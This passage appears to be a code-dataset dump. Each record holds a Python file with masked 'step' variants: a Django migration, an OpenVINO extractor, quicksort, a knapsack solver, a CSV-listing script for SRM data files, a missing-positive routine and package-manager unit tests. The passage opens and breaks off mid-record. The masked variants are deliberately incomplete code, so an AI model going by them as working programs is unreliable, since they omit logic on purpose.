True, primary_key=True)), ('email', models.EmailField(max_length=75\n )), ('total_subscription', models.IntegerField(default=0))],\n options={}, bases=(models.Model,)), migrations.CreateModel(name=\n 'MemberSubscription', fields=[('id', models.AutoField(verbose_name=\n 'ID', serialize=False, auto_created=True, primary_key=True)), (\n 'member', models.ForeignKey(to='members.Member'))], options={},\n bases=(models.Model,)), migrations.CreateModel(name='Subscription',\n fields=[('id', models.AutoField(verbose_name='ID', serialize=False,\n auto_created=True, primary_key=True)), ('subreddit', models.\n CharField(max_length=200)), ('count', models.IntegerField(default=5\n ))], options={}, bases=(models.Model,)), migrations.\n AlterUniqueTogether(name='subscription', unique_together=set([(\n 'subreddit', 'count')])), migrations.AddField(model_name=\n 'membersubscription', name='subscription', field=models.ForeignKey(\n to='members.Subscription'), preserve_default=True), migrations.\n AddField(model_name='member', name='subscription', field=models.\n ManyToManyField(to='members.Subscription', through=\n 'members.MemberSubscription'), preserve_default=True)]\n", "step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Member',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('email', models.EmailField(max_length=75)),\n ('total_subscription', models.IntegerField(default=0)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='MemberSubscription',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('member', models.ForeignKey(to='members.Member')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Subscription',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('subreddit', models.CharField(max_length=200)),\n ('count', models.IntegerField(default=5)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='subscription',\n unique_together=set([('subreddit', 'count')]),\n ),\n migrations.AddField(\n model_name='membersubscription',\n name='subscription',\n field=models.ForeignKey(to='members.Subscription'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='member',\n name='subscription',\n field=models.ManyToManyField(to='members.Subscription', through='members.MemberSubscription'),\n preserve_default=True,\n ),\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# Copyright (C) 2018-2023 Intel Corporation # SPDX-License-Identifier: Apache-2.0 from openvino.tools.mo.ops.pack import PackOp from openvino.tools.mo.front.extractor import FrontExtractorOp from openvino.tools.mo.front.mxnet.extractors.utils import get_mxnet_layer_attrs class StackFrontExtractor(FrontExtractorOp): op = 'stack' enabled = True @classmethod def extract(cls, node): attrs = get_mxnet_layer_attrs(node.symbol_dict) update_attrs = { 'axis': attrs.int('axis', 0) } # update the attributes of the node PackOp.update_node_stat(node, update_attrs) return cls.enabled
normal
{ "blob_id": "dd71feda1ed5ff7ef9dee1573ad63939a3e09691", "index": 7526, "step-1": "<mask token>\n\n\nclass StackFrontExtractor(FrontExtractorOp):\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass StackFrontExtractor(FrontExtractorOp):\n <mask token>\n <mask token>\n\n @classmethod\n def extract(cls, node):\n attrs = get_mxnet_layer_attrs(node.symbol_dict)\n update_attrs = {'axis': attrs.int('axis', 0)}\n PackOp.update_node_stat(node, update_attrs)\n return cls.enabled\n", "step-3": "<mask token>\n\n\nclass StackFrontExtractor(FrontExtractorOp):\n op = 'stack'\n enabled = True\n\n @classmethod\n def extract(cls, node):\n attrs = get_mxnet_layer_attrs(node.symbol_dict)\n update_attrs = {'axis': attrs.int('axis', 0)}\n PackOp.update_node_stat(node, update_attrs)\n return cls.enabled\n", "step-4": "from openvino.tools.mo.ops.pack import PackOp\nfrom openvino.tools.mo.front.extractor import FrontExtractorOp\nfrom openvino.tools.mo.front.mxnet.extractors.utils import get_mxnet_layer_attrs\n\n\nclass StackFrontExtractor(FrontExtractorOp):\n op = 'stack'\n enabled = True\n\n @classmethod\n def extract(cls, node):\n attrs = get_mxnet_layer_attrs(node.symbol_dict)\n update_attrs = {'axis': attrs.int('axis', 0)}\n PackOp.update_node_stat(node, update_attrs)\n return cls.enabled\n", "step-5": "# Copyright (C) 2018-2023 Intel Corporation\n# SPDX-License-Identifier: Apache-2.0\n\nfrom openvino.tools.mo.ops.pack import PackOp\nfrom openvino.tools.mo.front.extractor import FrontExtractorOp\nfrom openvino.tools.mo.front.mxnet.extractors.utils import get_mxnet_layer_attrs\n\n\nclass StackFrontExtractor(FrontExtractorOp):\n op = 'stack'\n enabled = True\n\n @classmethod\n def extract(cls, node):\n attrs = get_mxnet_layer_attrs(node.symbol_dict)\n\n update_attrs = {\n 'axis': attrs.int('axis', 0)\n }\n\n # update the attributes of the node\n PackOp.update_node_stat(node, update_attrs)\n\n return cls.enabled\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
def quick_sort(arr): q_sort(arr, 0, len(arr) - 1) def q_sort(arr, left, right): if left < right: pivot_index = partition(arr, left, right) q_sort(arr, left, pivot_index - 1) q_sort(arr, pivot_index + 1, right) def partition(arr, left, right): pivot = arr[left] while left < right: # 如果列表后边的数比基准数大或相等, 则前移一位直到有比基准数小的数出现 while left < right and arr[right] >= pivot: right -= 1 # 如找到, 则把第 right 个元素赋值给 left 位置,此时表中 left 和 right 的元素相等 arr[left] = arr[right] # # 减少下一个循环的一次比较 # if left < right: # left += 1 # 同样的方式比较前半区 while left < right and arr[left] <= pivot: left += 1 arr[right] = arr[left] # if left < right: # right -= 1 # 做完一轮比较之后, 列表被分成了两个半区, 并且 left=right , 需要将这个数设置回 pivot arr[left] = pivot return left def partition_1(arr, low, high): pivot = arr[high] store_index = low # 位置 store_index 存储较小元素 for i in range(low, high): # 当前元素小于或等于 pivot if arr[i] < pivot: arr[store_index], arr[i] = arr[i], arr[store_index] store_index += 1 arr[store_index], arr[high] = arr[high], arr[store_index] return store_index if __name__ == '__main__': # arr = [3, 44, 38, 5, 47, 15, 36, 26, 27, 2, 46, 4, 19, 50, 48] arr = [5, 9, 1, 11, 6, 7, 2, 4] quick_sort(arr) print(arr)
normal
{ "blob_id": "09a5c96b7f496aca6b34d7f0a83d5b1e182ca409", "index": 1627, "step-1": "def quick_sort(arr):\n q_sort(arr, 0, len(arr) - 1)\n\n\ndef q_sort(arr, left, right):\n if left < right:\n pivot_index = partition(arr, left, right)\n q_sort(arr, left, pivot_index - 1)\n q_sort(arr, pivot_index + 1, right)\n\n\n<mask token>\n", "step-2": "def quick_sort(arr):\n q_sort(arr, 0, len(arr) - 1)\n\n\ndef q_sort(arr, left, right):\n if left < right:\n pivot_index = partition(arr, left, right)\n q_sort(arr, left, pivot_index - 1)\n q_sort(arr, pivot_index + 1, right)\n\n\ndef partition(arr, left, right):\n pivot = arr[left]\n while left < right:\n while left < right and arr[right] >= pivot:\n right -= 1\n arr[left] = arr[right]\n while left < right and arr[left] <= pivot:\n left += 1\n arr[right] = arr[left]\n arr[left] = pivot\n return left\n\n\n<mask token>\n", "step-3": "def quick_sort(arr):\n q_sort(arr, 0, len(arr) - 1)\n\n\ndef q_sort(arr, left, right):\n if left < right:\n pivot_index = partition(arr, left, right)\n q_sort(arr, left, pivot_index - 1)\n q_sort(arr, pivot_index + 1, right)\n\n\ndef partition(arr, left, right):\n pivot = arr[left]\n while left < right:\n while left < right and arr[right] >= pivot:\n right -= 1\n arr[left] = arr[right]\n while left < right and arr[left] <= pivot:\n left += 1\n arr[right] = arr[left]\n arr[left] = pivot\n return left\n\n\ndef partition_1(arr, low, high):\n pivot = arr[high]\n store_index = low\n for i in range(low, high):\n if arr[i] < pivot:\n arr[store_index], arr[i] = arr[i], arr[store_index]\n store_index += 1\n arr[store_index], arr[high] = arr[high], arr[store_index]\n return store_index\n\n\n<mask token>\n", "step-4": "def quick_sort(arr):\n q_sort(arr, 0, len(arr) - 1)\n\n\ndef q_sort(arr, left, right):\n if left < right:\n pivot_index = partition(arr, left, right)\n q_sort(arr, left, pivot_index - 1)\n q_sort(arr, pivot_index + 1, right)\n\n\ndef partition(arr, left, right):\n pivot = arr[left]\n while left < right:\n while left < right and arr[right] >= pivot:\n right -= 1\n arr[left] = arr[right]\n while left < right and arr[left] <= pivot:\n left += 1\n arr[right] = arr[left]\n arr[left] = pivot\n return left\n\n\ndef partition_1(arr, low, high):\n pivot = arr[high]\n store_index = low\n for i in range(low, high):\n if arr[i] < pivot:\n arr[store_index], arr[i] = arr[i], arr[store_index]\n store_index += 1\n arr[store_index], arr[high] = arr[high], arr[store_index]\n return store_index\n\n\nif __name__ == '__main__':\n arr = [5, 9, 1, 11, 6, 7, 2, 4]\n quick_sort(arr)\n print(arr)\n", "step-5": "def quick_sort(arr):\n q_sort(arr, 0, len(arr) - 1)\n\n\ndef q_sort(arr, left, right):\n if left < right:\n pivot_index = partition(arr, left, right)\n\n q_sort(arr, left, pivot_index - 1)\n q_sort(arr, pivot_index + 1, right)\n\n\ndef partition(arr, left, right):\n pivot = arr[left]\n\n while left < right:\n # 如果列表后边的数比基准数大或相等, 则前移一位直到有比基准数小的数出现\n while left < right and arr[right] >= pivot:\n right -= 1\n # 如找到, 则把第 right 个元素赋值给 left 位置,此时表中 left 和 right 的元素相等\n arr[left] = arr[right]\n # # 减少下一个循环的一次比较\n # if left < right:\n # left += 1\n\n # 同样的方式比较前半区\n while left < right and arr[left] <= pivot:\n left += 1\n arr[right] = arr[left]\n # if left < right:\n # right -= 1\n\n # 做完一轮比较之后, 列表被分成了两个半区, 并且 left=right , 需要将这个数设置回 pivot\n arr[left] = pivot\n return left\n\n\ndef partition_1(arr, low, high):\n pivot = arr[high]\n store_index = low # 位置 store_index 存储较小元素\n\n for i in range(low, high):\n # 当前元素小于或等于 pivot\n if arr[i] < pivot:\n arr[store_index], arr[i] = arr[i], arr[store_index]\n store_index += 1\n arr[store_index], arr[high] = arr[high], arr[store_index]\n\n return store_index\n\n\nif __name__ == '__main__':\n # arr = [3, 44, 38, 5, 47, 15, 36, 26, 27, 2, 46, 4, 19, 50, 48]\n arr = [5, 9, 1, 11, 6, 7, 2, 4]\n quick_sort(arr)\n print(arr)\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
import sys def read(inp): res = [] n, v = map(int, inp.readline().split()) for i in range(n): x, y = map(int, inp.readline().split()) res.append((x, y)) return v, res def solve(v, items): res = 0 rem_v = v for item in items: if rem_v > item[1]: res += item[0] rem_v -= item[1] else: res += item[0] * (rem_v/item[1]) break return res if __name__ == '__main__': inp = open('1', 'r') # inp = sys.stdin v, items = read(inp) s_items = sorted(items, key=lambda i: i[0]/i[1], reverse=True) res = solve(v, s_items) print(res)
normal
{ "blob_id": "8b0e7e8f2031df217894e980758e15d7401c0981", "index": 2750, "step-1": "<mask token>\n\n\ndef read(inp):\n res = []\n n, v = map(int, inp.readline().split())\n for i in range(n):\n x, y = map(int, inp.readline().split())\n res.append((x, y))\n return v, res\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef read(inp):\n res = []\n n, v = map(int, inp.readline().split())\n for i in range(n):\n x, y = map(int, inp.readline().split())\n res.append((x, y))\n return v, res\n\n\ndef solve(v, items):\n res = 0\n rem_v = v\n for item in items:\n if rem_v > item[1]:\n res += item[0]\n rem_v -= item[1]\n else:\n res += item[0] * (rem_v / item[1])\n break\n return res\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef read(inp):\n res = []\n n, v = map(int, inp.readline().split())\n for i in range(n):\n x, y = map(int, inp.readline().split())\n res.append((x, y))\n return v, res\n\n\ndef solve(v, items):\n res = 0\n rem_v = v\n for item in items:\n if rem_v > item[1]:\n res += item[0]\n rem_v -= item[1]\n else:\n res += item[0] * (rem_v / item[1])\n break\n return res\n\n\nif __name__ == '__main__':\n inp = open('1', 'r')\n v, items = read(inp)\n s_items = sorted(items, key=lambda i: i[0] / i[1], reverse=True)\n res = solve(v, s_items)\n print(res)\n", "step-4": "import sys\n\n\ndef read(inp):\n res = []\n n, v = map(int, inp.readline().split())\n for i in range(n):\n x, y = map(int, inp.readline().split())\n res.append((x, y))\n return v, res\n\n\ndef solve(v, items):\n res = 0\n rem_v = v\n for item in items:\n if rem_v > item[1]:\n res += item[0]\n rem_v -= item[1]\n else:\n res += item[0] * (rem_v / item[1])\n break\n return res\n\n\nif __name__ == '__main__':\n inp = open('1', 'r')\n v, items = read(inp)\n s_items = sorted(items, key=lambda i: i[0] / i[1], reverse=True)\n res = solve(v, s_items)\n print(res)\n", "step-5": "import sys\n\n\ndef read(inp):\n res = []\n n, v = map(int, inp.readline().split())\n for i in range(n):\n x, y = map(int, inp.readline().split())\n res.append((x, y))\n\n return v, res\n\n\ndef solve(v, items):\n res = 0\n rem_v = v\n\n for item in items:\n if rem_v > item[1]:\n res += item[0]\n rem_v -= item[1]\n else:\n res += item[0] * (rem_v/item[1])\n break\n\n return res\n\n\nif __name__ == '__main__':\n inp = open('1', 'r')\n # inp = sys.stdin\n\n v, items = read(inp)\n s_items = sorted(items, key=lambda i: i[0]/i[1], reverse=True)\n res = solve(v, s_items)\n\n print(res)\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
#!/usr/bin/env python import argparse import csv import glob import os import sys def run_main(): """ Main function to process user input and then generate the description files for each run :return: exit code -- 0 on success, 1 otherwise """ parser = argparse.ArgumentParser(description="Scan a run directory and create files to ") parser.add_argument('--run-directory', dest='run_directory', action='store', default='', help='path to directory with xed files to process') args = parser.parse_args(sys.argv[1:]) if not os.path.isdir(args.run_directory): sys.stderr.write("{0} is not a directory, exiting\n".format(args.run_directory)) return 1 run_name = os.path.abspath(args.run_directory) if os.path.basename(run_name): run_name = os.path.basename(run_name) else: run_name = os.path.split(run_name)[0].split('/')[-1] if not os.path.exists('info'): os.mkdir('info') for directory in os.listdir(args.run_directory): if not os.path.isdir(os.path.join(args.run_directory, directory)): continue csv_filename = "info/{0}_{1}_files.csv".format(run_name, directory) entries = glob.glob(os.path.join(args.run_directory, directory, '*.xed')) if len(entries) == 0: continue with open(csv_filename, 'w') as file_obj: csv_writer = csv.writer(file_obj) csv_writer.writerow(['Run', 'Data Set', 'File']) for entry in entries: uri = "srm://ceph-se.osgconnect.net:8443/srm/v2/" + \ "server?SFN=/cephfs/srm/xenon/" + \ entry.replace('/xenon/', '') csv_writer.writerow([run_name, directory, uri]) if __name__ == '__main__': sys.exit(run_main())
normal
{ "blob_id": "6e6c6c5795e8723a86ae5dfc8f40df57d3dd10f7", "index": 3336, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef run_main():\n \"\"\"\n Main function to process user input and then generate the description files for each run\n\n :return: exit code -- 0 on success, 1 otherwise\n \"\"\"\n parser = argparse.ArgumentParser(description=\n 'Scan a run directory and create files to ')\n parser.add_argument('--run-directory', dest='run_directory', action=\n 'store', default='', help='path to directory with xed files to process'\n )\n args = parser.parse_args(sys.argv[1:])\n if not os.path.isdir(args.run_directory):\n sys.stderr.write('{0} is not a directory, exiting\\n'.format(args.\n run_directory))\n return 1\n run_name = os.path.abspath(args.run_directory)\n if os.path.basename(run_name):\n run_name = os.path.basename(run_name)\n else:\n run_name = os.path.split(run_name)[0].split('/')[-1]\n if not os.path.exists('info'):\n os.mkdir('info')\n for directory in os.listdir(args.run_directory):\n if not os.path.isdir(os.path.join(args.run_directory, directory)):\n continue\n csv_filename = 'info/{0}_{1}_files.csv'.format(run_name, directory)\n entries = glob.glob(os.path.join(args.run_directory, directory,\n '*.xed'))\n if len(entries) == 0:\n continue\n with open(csv_filename, 'w') as file_obj:\n csv_writer = csv.writer(file_obj)\n csv_writer.writerow(['Run', 'Data Set', 'File'])\n for entry in entries:\n uri = ('srm://ceph-se.osgconnect.net:8443/srm/v2/' +\n 'server?SFN=/cephfs/srm/xenon/' + entry.replace(\n '/xenon/', ''))\n csv_writer.writerow([run_name, directory, uri])\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef run_main():\n \"\"\"\n Main function to process user input and then generate the description files for each run\n\n :return: exit code -- 0 on success, 1 otherwise\n \"\"\"\n parser = argparse.ArgumentParser(description=\n 'Scan a run directory and create files to ')\n parser.add_argument('--run-directory', dest='run_directory', action=\n 'store', default='', help='path to directory with xed files to process'\n )\n args = parser.parse_args(sys.argv[1:])\n if not os.path.isdir(args.run_directory):\n sys.stderr.write('{0} is not a directory, exiting\\n'.format(args.\n run_directory))\n return 1\n run_name = os.path.abspath(args.run_directory)\n if os.path.basename(run_name):\n run_name = os.path.basename(run_name)\n else:\n run_name = os.path.split(run_name)[0].split('/')[-1]\n if not os.path.exists('info'):\n os.mkdir('info')\n for directory in os.listdir(args.run_directory):\n if not os.path.isdir(os.path.join(args.run_directory, directory)):\n continue\n csv_filename = 'info/{0}_{1}_files.csv'.format(run_name, directory)\n entries = glob.glob(os.path.join(args.run_directory, directory,\n '*.xed'))\n if len(entries) == 0:\n continue\n with open(csv_filename, 'w') as file_obj:\n csv_writer = csv.writer(file_obj)\n csv_writer.writerow(['Run', 'Data Set', 'File'])\n for entry in entries:\n uri = ('srm://ceph-se.osgconnect.net:8443/srm/v2/' +\n 'server?SFN=/cephfs/srm/xenon/' + entry.replace(\n '/xenon/', ''))\n csv_writer.writerow([run_name, directory, uri])\n\n\nif __name__ == '__main__':\n sys.exit(run_main())\n", "step-4": "import argparse\nimport csv\nimport glob\nimport os\nimport sys\n\n\ndef run_main():\n \"\"\"\n Main function to process user input and then generate the description files for each run\n\n :return: exit code -- 0 on success, 1 otherwise\n \"\"\"\n parser = argparse.ArgumentParser(description=\n 'Scan a run directory and create files to ')\n parser.add_argument('--run-directory', dest='run_directory', action=\n 'store', default='', help='path to directory with xed files to process'\n )\n args = parser.parse_args(sys.argv[1:])\n if not os.path.isdir(args.run_directory):\n sys.stderr.write('{0} is not a directory, exiting\\n'.format(args.\n run_directory))\n return 1\n run_name = os.path.abspath(args.run_directory)\n if os.path.basename(run_name):\n run_name = os.path.basename(run_name)\n else:\n run_name = os.path.split(run_name)[0].split('/')[-1]\n if not os.path.exists('info'):\n os.mkdir('info')\n for directory in os.listdir(args.run_directory):\n if not os.path.isdir(os.path.join(args.run_directory, directory)):\n continue\n csv_filename = 'info/{0}_{1}_files.csv'.format(run_name, directory)\n entries = glob.glob(os.path.join(args.run_directory, directory,\n '*.xed'))\n if len(entries) == 0:\n continue\n with open(csv_filename, 'w') as file_obj:\n csv_writer = csv.writer(file_obj)\n csv_writer.writerow(['Run', 'Data Set', 'File'])\n for entry in entries:\n uri = ('srm://ceph-se.osgconnect.net:8443/srm/v2/' +\n 'server?SFN=/cephfs/srm/xenon/' + entry.replace(\n '/xenon/', ''))\n csv_writer.writerow([run_name, directory, uri])\n\n\nif __name__ == '__main__':\n sys.exit(run_main())\n", "step-5": "#!/usr/bin/env python\n\nimport argparse\nimport csv\nimport glob\nimport os\nimport sys\n\n\ndef run_main():\n \"\"\"\n Main function to process user input and then generate the description files for each run\n\n :return: exit code -- 0 on success, 1 otherwise\n \"\"\"\n\n parser = argparse.ArgumentParser(description=\"Scan a run directory and create files to \")\n parser.add_argument('--run-directory', dest='run_directory',\n action='store', default='',\n help='path to directory with xed files to process')\n args = parser.parse_args(sys.argv[1:])\n\n if not os.path.isdir(args.run_directory):\n sys.stderr.write(\"{0} is not a directory, exiting\\n\".format(args.run_directory))\n return 1\n run_name = os.path.abspath(args.run_directory)\n\n if os.path.basename(run_name):\n run_name = os.path.basename(run_name)\n else:\n run_name = os.path.split(run_name)[0].split('/')[-1]\n\n if not os.path.exists('info'):\n os.mkdir('info')\n\n for directory in os.listdir(args.run_directory):\n if not os.path.isdir(os.path.join(args.run_directory, directory)):\n continue\n csv_filename = \"info/{0}_{1}_files.csv\".format(run_name, directory)\n entries = glob.glob(os.path.join(args.run_directory, directory, '*.xed'))\n if len(entries) == 0:\n continue\n with open(csv_filename, 'w') as file_obj:\n csv_writer = csv.writer(file_obj)\n csv_writer.writerow(['Run', 'Data Set', 'File'])\n for entry in entries:\n uri = \"srm://ceph-se.osgconnect.net:8443/srm/v2/\" + \\\n \"server?SFN=/cephfs/srm/xenon/\" + \\\n entry.replace('/xenon/', '')\n csv_writer.writerow([run_name, directory, uri])\n\n\nif __name__ == '__main__':\n sys.exit(run_main())\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
def firstMissingPositive(nums): if len(nums) == 0: return 1 if len(nums) == 1: if nums[0] == 1: return 2 else: return 1 nums.sort() current = 1 nums = [ele for ele in nums if ele > 0] if len(nums) == 0: return 1 if len(nums) == 1: if nums[0] == 1: return 2 else: return 1 for i in range(len(nums) - 1): if current != nums[i]: return 1 else: while i < len(nums) - 1 and (nums[i] + 1 == nums[i + 1] or nums [i] == nums[i + 1]): i += 1 if i == len(nums) - 2 and nums[i] + 1 == nums[i + 1]: return nums[i + 1] + 1 else: return nums[i] + 1 return 1 print(firstMissingPositive([1, 1000])) print(firstMissingPositive([1, 0])) print(firstMissingPositive([-1, -2])) print(firstMissingPositive([1, 2, 0])) print(firstMissingPositive([3, 4, -1, 1])) print(firstMissingPositive([7, 8, 9, 11, 12]))
normal
{ "blob_id": "89addbf2c49d568250cd5a48d3fdb73914ce50c4", "index": 2899, "step-1": "<mask token>\n", "step-2": "def firstMissingPositive(nums):\n if len(nums) == 0:\n return 1\n if len(nums) == 1:\n if nums[0] == 1:\n return 2\n else:\n return 1\n nums.sort()\n current = 1\n nums = [ele for ele in nums if ele > 0]\n if len(nums) == 0:\n return 1\n if len(nums) == 1:\n if nums[0] == 1:\n return 2\n else:\n return 1\n for i in range(len(nums) - 1):\n if current != nums[i]:\n return 1\n else:\n while i < len(nums) - 1 and (nums[i] + 1 == nums[i + 1] or nums\n [i] == nums[i + 1]):\n i += 1\n if i == len(nums) - 2 and nums[i] + 1 == nums[i + 1]:\n return nums[i + 1] + 1\n else:\n return nums[i] + 1\n return 1\n\n\n<mask token>\n", "step-3": "def firstMissingPositive(nums):\n if len(nums) == 0:\n return 1\n if len(nums) == 1:\n if nums[0] == 1:\n return 2\n else:\n return 1\n nums.sort()\n current = 1\n nums = [ele for ele in nums if ele > 0]\n if len(nums) == 0:\n return 1\n if len(nums) == 1:\n if nums[0] == 1:\n return 2\n else:\n return 1\n for i in range(len(nums) - 1):\n if current != nums[i]:\n return 1\n else:\n while i < len(nums) - 1 and (nums[i] + 1 == nums[i + 1] or nums\n [i] == nums[i + 1]):\n i += 1\n if i == len(nums) - 2 and nums[i] + 1 == nums[i + 1]:\n return nums[i + 1] + 1\n else:\n return nums[i] + 1\n return 1\n\n\nprint(firstMissingPositive([1, 1000]))\nprint(firstMissingPositive([1, 0]))\nprint(firstMissingPositive([-1, -2]))\nprint(firstMissingPositive([1, 2, 0]))\nprint(firstMissingPositive([3, 4, -1, 1]))\nprint(firstMissingPositive([7, 8, 9, 11, 12]))\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
from . import UbuntuPackageManager, RedHatPackageManager, SolarisPackageManager, RpmMixin from infi import unittest from infi.run_as_root import RootPermissions from contextlib import contextmanager from infi import pkgmgr from mock import patch import distro # pylint: disable-all class TestOnUbuntu(unittest.TestCase): def _running_on_ubuntu(self): return distro.id() == "ubuntu" def setUp(self): super(TestOnUbuntu, self).setUp() self._should_skip() def _should_skip(self): if not self._running_on_ubuntu(): raise self.skipTest("This test runs only on ubuntu") if not RootPermissions().is_root(): raise self.skipTest("This test must run with root permissions") def test_sg3_utils(self): from infi.execute import execute execute('apt-get update'.split()) self._check_package("sg3-utils", "/usr/bin/sg_inq") def _check_package(self, package_name, executable_name): pkgmgr = UbuntuPackageManager() is_installed_before = self._is_package_seems_to_be_installed(package_name, executable_name) self.assertEqual(pkgmgr.is_package_installed(package_name), is_installed_before) # Do the opposite pkgmgr.install_package(package_name) if not is_installed_before else pkgmgr.remove_package(package_name) self.assertNotEqual(pkgmgr.is_package_installed(package_name), is_installed_before) def _is_package_seems_to_be_installed(self, package_name, executable_name): from os.path import exists return exists(executable_name) def test_check_unknown_package(self): pkgmgr = UbuntuPackageManager() self.assertFalse(pkgmgr.is_package_installed('blablabla9988ok')) class TestOnRedHat(unittest.TestCase): def _running_on_redhat(self): return distro.id() == "rhel" def setUp(self): super(TestOnRedHat, self).setUp() self._should_skip() def _should_skip(self): if not self._running_on_redhat(): raise self.skipTest("This test runs only on red hat") if not RootPermissions().is_root(): raise self.skipTest("This test must run with root permissions") def test_sg3_utils(self): self._check_package("sg3_utils", "/usr/bin/sg_inq") def _check_package(self, package_name, executable_name): pkgmgr = RedHatPackageManager() is_installed_before = self._is_package_seems_to_be_installed(package_name, executable_name) self.assertEqual(pkgmgr.is_package_installed(package_name), is_installed_before) # Do the opposite pkgmgr.install_package(package_name) if not is_installed_before else pkgmgr.remove_package(package_name) self.assertNotEqual(pkgmgr.is_package_installed(package_name), is_installed_before) def _is_package_seems_to_be_installed(self, package_name, executable_name): from os.path import exists return exists(executable_name) class Output(object): def __init__(self, returncode=0, stdout='', stderr=''): super(Output, self).__init__() self._returncode = returncode self._stdout = stdout self._stderr = stderr def get_stdout(self): return self._stdout def get_stderr(self): return self._stderr def get_returncode(self): return self._returncode def wait(self, timeout=None): pass class TestUbuntuMock(TestOnUbuntu): def _should_skip(self): pass def _dpkg_query_s(self): from textwrap import dedent if self._installed: return Output(stdout=dedent(""" Package: sg3-utils Status: installed ok installed Priority: optional Version: 1.30-1 Section: admin """).encode("ascii")) else: return Output(stdout=dedent(""" dpkg-query: package sg3-utils is not installed and no information is available Use dpkg --info (= dpkg-deb --info) to examine archive files, and dpkg --contents (= dpkg-deb --contents) to list their contents. """).encode("ascii"), returncode=1) def _dpkg_query_l(self): from textwrap import dedent return Output(stdout=dedent(""" Desired=Unknown/Install/Remove/Purge/Hold | Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend |/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad) ||/ Name Version Architecture Description +++-===========================-==================-==================-=========================================================== {} sg3-utils 1.30-1 i386 utilities for devices using the SCSI command set """.format("ii" if self._installed else "un")).encode("ascii")) def _apt_get_install(self): self._installed = True return Output() def _apt_get_update(self): return Output() @contextmanager def _apply_patches(self): with patch("infi.execute.execute") as execute: def side_effect(*args, **kwargs): command = args[0] if "dpkg-query" in command: if "-s" in command: return self._dpkg_query_s() if "-l" in command: return self._dpkg_query_l() elif "apt-get install" in ' '.join(command): return self._apt_get_install() elif "apt-get update" in ' '.join(command): return self._apt_get_update() raise NotImplementedError() execute.side_effect = side_effect yield def test_sg3_utils(self): with self._apply_patches(): super(TestUbuntuMock, self).test_sg3_utils() def test_check_unknown_package(self): with self._apply_patches(): super(TestUbuntuMock, self).test_check_unknown_package() def setUp(self): self._installed = False def _is_package_seems_to_be_installed(self, package_name, executable_name): return self._installed class TestRedHatMock(TestOnRedHat): def _should_skip(self): pass def _rpm_query(self): return Output(stdout=b'sg3_utils-1.25-5.el5' if self._installed else b'package sg3_utils is not installed', returncode=0 if self._installed else 1) def _yum_install(self): self._installed = True return Output() @contextmanager def _apply_patches(self): with patch("infi.execute.execute") as execute: def side_effect(*args, **kwargs): command = args[0] if "-q" in command: return self._rpm_query() elif "install" in command: return self._yum_install() raise NotImplementedError() execute.side_effect = side_effect yield def test_sg3_utils(self): with self._apply_patches(): super(TestRedHatMock, self).test_sg3_utils() pass def setUp(self): self._installed = False def _is_package_seems_to_be_installed(self, package_name, executable_name): return self._installed class test_package_versioning(unittest.TestCase): Solaris_v1 = b""" VERSION: 6.0.100.000,REV=08.01.2012.09.00""" Solaris_v2 = b""" VERSION: 5.14.2.5""" Ubuntu_v1 = b"""Version: 0.4.9-3ubuntu7.2""" Ubuntu_v2 = b"""Version: 1:1.2.8.dfsg-1ubuntu1""" rpm_v1 = b"""4.8-7.el7""" rpm_v2 = b"""18.168.6.1-34.el7""" def test_solaris_versioning_v1(self): with patch.object(pkgmgr, 'execute_command') as patched: patched().get_stdout.return_value = self.Solaris_v1 patched().get_returncode.return_value = 0 result = SolarisPackageManager().get_installed_version(self.Solaris_v1) self.assertEqual(result, {'version': '6.0.100.000', 'revision': '08.01.2012.09.00'}) def test_solaris_versioning_v2(self): with patch.object(pkgmgr, 'execute_command') as patched: patched().get_stdout.return_value = self.Solaris_v2 patched().get_returncode.return_value = 0 result = SolarisPackageManager().get_installed_version(self.Solaris_v2) self.assertEqual(result, {'version': '5.14.2.5'}) def test_ubuntu_versioning_v1(self): with patch.object(pkgmgr, 'execute_command') as patched: patched().get_stdout.return_value = self.Ubuntu_v1 patched().get_returncode.return_value = 0 result = UbuntuPackageManager().get_installed_version(self.Ubuntu_v1) self.assertEqual(result, {'version': '0.4.9-3ubuntu7.2'}) def test_ubuntu_versioning_v2(self): with patch.object(pkgmgr, 'execute_command') as patched: patched().get_stdout.return_value = self.Ubuntu_v2 patched().get_returncode.return_value = 0 result = UbuntuPackageManager().get_installed_version(self.Ubuntu_v2) self.assertEqual(result, {'version': '1:1.2.8.dfsg-1ubuntu1'}) def test_rpm_versioning_v1(self): with patch.object(pkgmgr, 'execute_command') as patched: patched().get_stdout.return_value = self.rpm_v1 patched().get_returncode.return_value = 0 result = RpmMixin().get_installed_version(self.rpm_v1) self.assertEqual(result, {'version': '4.8-7.el7'}) def test_rpm_versioning_v2(self): with patch.object(pkgmgr, 'execute_command') as patched: patched().get_stdout.return_value = self.rpm_v2 patched().get_returncode.return_value = 0 result = 